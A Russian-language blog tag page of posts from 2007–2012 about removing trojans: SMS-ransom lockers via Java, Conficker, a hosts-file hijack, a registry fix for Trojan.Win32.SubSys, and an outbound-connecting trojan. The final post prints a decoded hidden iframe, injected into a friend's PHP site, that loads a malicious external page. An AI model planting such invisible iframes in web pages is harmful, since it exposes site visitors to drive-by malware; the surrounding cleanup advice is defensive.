Поиск по тегу "троян", стр…

Java, сдохни

троян вирус

Сижу, работаю в Лайнс. Вдруг всплыват знакомое окошко "вы были замечены за просмотром порнографии, компутер заблокирован, отправьте СМС на номер..." :-D

Впервые словил трояшку на основном компе. Антивирь - честно купленный, постоянно обновляемый. Файрвол включён. За роутером сижу. Не под админом сижу. Правда, один косяк - сижу на винде :-) А всё почему - потому что в Опере по идиотски отключение Java сделали несколько версий назад. Трояшка через Яву и пролез - следы в кеше Deployment.

Пролез, кинул в корень учётки вреднючий екзешник, прописался в Shell. Убился легко - обычным методом загрузки с LiveCD и правкой реестра. Ну а потом запустил полное сканирование, которое вот уже час шпарит.

А отключить Java в Опере вроде как получилось добавлением строчки
npjp2.dll= Fuck JAVA

в файл plugin-ignore.ini в установочном каталоге Оперы.

UPD> Ну и проверить браузер на поддержку Java можно вот тут
Копия в ЖЖ Gol      Среда, 2 Мая, 2012 19:29       7


Реванш над трояшкой

троян вирус

В продолжение вот этой заметки...

Пару дней назад Маман подключила, наконец-то, проводной инет от Билайна. После тормозного ADSL Домолинка (512Kbit/sec) два мегабита днём (и четыре ночью), причём симметричных и анлимных - это лепота. Но практически одновременно с подключением интернета у Маман резко активировались трояшки. Уж не знаю, где она их подцепила, но факт есть факт - трояшки имеются и даже себя активно проявляют - появляются непонятно откуда окна (консольные приложения) где скачет курсор.

Маман пожаловалась мне, я полез смотреть через удалёнку (конечно же, TeamViewer). Только невооружённым взглядом нашёл кучу заразы (лицензионный и свежеобновлённый NOD32 молчал в тряпочку), AVZ нашёл ещё кучку. Начал в FAR'е убивать налево и направо. Главная зараза (конечно же, ею оказался Conficker, но были и другие трояшки) сидела в C:RECYCLER, причём не в обычных тамошних подкаталогах вида S-1... а в R-1-что_то_там. Файлег назывался acleaner.exe, размером 41004 байт), в процессах не виден, не переименовывается не удаляется и всё в том же духе, т.е. явно запущен. В реестре нашёлся уж не помню в какой ветке, параметр taskman. Удаляться из реестра не пожелал, мгновенно перезаписывал параметр, если я его удалял или изменял. Права доступа тож возвращал в исходную позицию.

[ раскрыть ]    [ читать далее ]

Копия в ЖЖ Gol      Вторник, 22 Марта, 2011 07:40       2


Трояшка победил. Пока победил.

троян вирус

Conficker у Маман. Подробности позже...

История вот тут описана .
Копия в ЖЖ Gol      Суббота, 19 Марта, 2011 21:38       1


Зараза подменяет файл hosts.

вирус троян

Всё-таки это случилось - Катюха подцепила (под своей учёткой) заразу. На моём основном ноуте :-( NOD32 заразу не увидел, но он давно не обновлялся ибо лицензия кончилась. Так что сразу появился повод продлить лицуху.

Короче, трояшка интересная, уже почти все её копии поубивал, но она ещё живая. Щас вот основной ноут проверяется в безопасном режиме AVZ и NOD32.

Раскопки дали много интересного, но это попозже опишу. Пролез трояшка под оперой через жаву (jre). NOD32 его определяет как Kriptik. Заметили когда Катюха попыталась во "вконтакте" зайти, на его главной странице появилось сообщение с просьбой отправить смс.

Оказалось, подмена hosts. Но не банально, а весьма интересно.

[ раскрыть ]    [ читать далее ]

Копия в ЖЖ Gol      Воскресенье, 19 Сентября, 2010 00:38       14


Трояшка хочет СМС на номер 8353.

троян вирус комп софт винда зараза

Приволокли тачку на прокачку. Тачка под виндой, при загрузке во весь экран появляется сообщение о том что винда нелицензионная и надо отправить СМС на номер 8353. Ггы. Кстати, раньше с таким не сталкивался.

Полный размер

[ раскрыть ]    [ читать далее ]

Копия в ЖЖ Gol      Четверг, 19 Ноября, 2009 02:39       98


Оригинальная трояшка.

троян зараза комп инет

В офисе на единственной тачке вне домена (и без антивиря) обнаружилась забавная трояшка. Внешне проявилась тем что при открытии в IE любого сайта посреди окна появлялась табличка с анонсами и текстом "Для удаления новостной ленты отправьте SMS на номер такой-то такой-то".

Вот так внешне проявляется

Полный размер Вот так внешне проявляется

[ раскрыть ]    [ читать далее ]

Копия в ЖЖ Gol      Понедельник, 12 Января, 2009 19:18       7


Опять трояшка.

комп троян

На этот раз у всё той же замши генерального директора.

Trojan. Win32.SubSys.ce

base****32 - это вирус, который подменяет dllку basesrv(точнее путь к ней)
имя файла каждый раз разное (у меня например было basejrdos32), поэтому ты ничего не нашел

лечится так:
1. Грузимся с MiniPE или другого загрузчика (я грузился с ERD)
2. Запускаем RegeditPE, скармливаем ему файлы нашей пострадавшей винды
3. Лезем HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems
4. Параметр Windows должен быть следующего вида

%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,3072,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ProfileControl=Off MaxRequestThreads=16

5. Перезагружаемся и все должно быть ОК!



Сделал всё так как написано и, вуаля, всё работает. Оказалось Каспер этого трояшку убивает, а реестр не правит. Вот тачка и отказывается грузьтся.

Спасибо Форум ru-board.com
Копия в ЖЖ Gol      Четверг, 17 Июля, 2008 18:42       0


Воюю с троянчиком.

зараза троян

Недавно заметил что на серваке сквид кушает 70-90 % процессорного времени. Непорядок, однозначно. Перелопатил пол-сервака - ничего что могло бы такие тормоза вызвать не нашёл.

Стал по-очереди отрубать клиентские подключения к сквиду. Первым делом отключил сетку бухгалтерии - загрузка проца сквидом сразу же упала до обычных 4%. Вотоно, как говорицца...

Попёрся в бухгалтерию. Обновил базы антивиря, всё проверил - ничего не найдено, типа всё чисто. Вернул по-очерёдно подключения бухгалтерских тачек к сквиду. При подключении первых трёх - процент сквида не менялся, а вот при четвёртой - опять сразу полез на 80%.

Короче, заразу локализовал. Полез лечить. Ещё раз прогнал NOD32 - ничего не найдено. Полез за струментом.

Струментом стали сисинтерналовские ProccessExplorer и TCPView.

TCPView сразу показал что winlogon.exe ломится на s14.esthost.eu:33344. Эстоооонцы атакуууууют, однаааааако...

Полный размер


Соединение у него толком установить не получается, ибо инет закрыт.

[ раскрыть ]    [ читать далее ]

Копия в ЖЖ Gol      Вторник, 24 Июня, 2008 00:46       0


Трояшка.

троян сайт инет

Один знакомый прислал сцылку на свой сайт, где при загрузке на клиентской тачке антивирь стал постоянно ругаться на Trojan-Clicker.HTML.IFrame.l
Оказалось что таинственным образом в начале и в конце кода HTML, т.е. до тэга < html> и после < /html> появился код



Причём этот кусок текста был в куче .php файлов. Убрать-то я его отовсюду поубирал, но интересно стало откуда взялось и чё такое.

Перекодировав в нормальный вид получаем


< iframe src= 'http://setevik.org/fight_club/index.php'
width=1 height=1 frameborder=0 hspace=0
vspace=0scrolling=no marginwidth=0 marginheight=0
allowtransparency=true>



Полез на setevik.org, нету такой папки. Видать устарело :-)
Поискал в Яше, нашёл несколько интересных ссылочек, видать много народу с таким столкнулось. Народ сошёлся во мнении, (я тож так сразу подумал, так что знакомому посоветовал первым делом поменять пароль от фтп) что пароли были каким-то образом вытащены и применены. Или украдены напрямую у хостера, или ещё как-нибудь, способов хватает. На форуме Касперского кто-то сказал что пароли вероятно троян насобирал на той тачке откуда владелец сайта на свой фтп заходил.
Короче, мораль. Пароли от фтп в фаре или в тотале в открытом виде не хранить, и ваще их нигде не палить. Ещё нежелательно заходить на свой фтп из публичных мест - инет-кафе и всё остальное аналогичное, так как перехватить пароли не сложно. Особенно если этим занимаются админы сервака через который инет-кафе в инете сидит.
Советы, в общем-то, очевидные, но всё равно много народу про них забывает.
Копия в ЖЖ Gol      Среда, 11 Июля, 2007 19:08       0


Сейчас на сайте: 0
и 10 гостей









Страница сгенерирована за 0.13795185089111 мкс